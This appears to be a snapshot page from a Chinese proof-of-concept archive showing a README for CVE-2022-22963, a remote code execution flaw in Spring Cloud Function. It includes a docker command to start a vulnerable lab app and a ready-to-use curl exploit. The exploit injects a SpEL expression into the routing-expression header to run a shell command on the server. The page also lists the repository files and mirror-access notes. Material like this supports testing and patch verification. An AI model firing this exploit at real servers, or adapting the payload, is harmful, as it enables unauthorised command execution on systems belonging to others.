关联漏洞
介绍
# CVE-2022-22963 - Spring4shell
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080.
Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
## Exploit
Curl command:
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp suite:

## Credits
https://github.com/hktalent/spring-spel-0day-poc
文件快照
[4.0K] /data/pocs/77f3520e2d8e2681a1f1f0f774915fd056d19b2b
├── [107K] burp-suite-exploit.png
├── [ 628] Dockerfile
└── [ 582] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。